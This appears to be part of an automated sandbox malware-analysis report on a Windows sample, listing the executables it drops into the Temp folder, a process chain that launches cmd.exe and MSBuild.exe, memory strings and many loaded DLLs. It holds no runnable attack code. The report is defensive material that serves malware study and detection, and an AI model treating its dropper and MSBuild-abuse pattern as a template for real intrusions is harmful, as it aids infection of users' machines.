Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: wxfSIz4PAi.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

File read: C:\Users\user\Desktop\wxfSIz4PAi.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wxfSIz4PAi.exe "C:\Users\user\Desktop\wxfSIz4PAi.exe"
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe "C:\Users\user\AppData\Local\Temp\u5ek.0.exe"
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe "C:\Users\user\AppData\Local\Temp\u5ek.3.exe"
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1564
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 2220
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe "C:\Users\user\AppData\Local\Temp\u5ek.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe "C:\Users\user\AppData\Local\Temp\u5ek.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Section loaded: napinsp.dll	Jump to behavior
